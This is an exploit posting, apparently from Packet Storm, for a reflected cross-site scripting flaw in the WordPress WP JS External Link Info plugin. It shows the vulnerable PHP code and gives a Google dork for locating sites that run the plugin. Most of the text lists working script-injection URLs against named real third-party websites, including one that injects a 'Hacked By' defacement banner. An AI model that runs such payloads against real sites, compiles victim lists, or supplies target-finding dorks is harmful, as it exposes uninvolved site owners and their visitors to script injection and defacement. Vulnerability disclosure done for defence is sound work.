WordPress WP JS External Link Info plugin suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
2ef7d352f427a842088de677084fa9899cee9258a7e93dc579f0735225b1b6cd#########################################
# Exploit Title : Wordpress Wp Js External link Info Cross Site Scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl:wp-content/plugins/wp-js-external-link-info
#
# Date : 2014/4/16
#
# Tested on : Windows 7 , Linux
#
# Version : 1.21
#
######################
# Exploit : Cross Site Scripting
# Location : [Target]/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=[XSS]
#
######################
# Vulnerable Code :
# [CODE]
$url = $_GET['url'];
$blog = urldecode($_GET['blog']);
...
<?php echo $url; ?>
<?php echo $blog; ?>
# [/CODE]
#
###
Demo
# http://www.timefederalsavings.com/newsite2/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
http://www.motiv.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
# http://www.blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
# http://sectank.net/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
# http://bkalitva.ru/blog/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://www.thfcu.org/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
# http://openwebstuff.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://www.londonfootball.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%22%3E%3Cmarquee%3EHacked%20By%20Milad%20Hacking%20TEST%20XSS%20Loool%3C/marquee%3E
#
#
#http://www.ilikesharepoint.de/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
#http://accordnetwork.org/forum/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://blog.al8z.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://michelearnese.it/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://www.city-infos.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://konaproperty.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://www.degrotelongontstekingmeting.nl/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://www.cityblogs.nfo.ph/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
# http://www.cityblogs.nfo.ph/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E
#
#
#
############################################
Discovered By : Milad Hacking
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
############################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed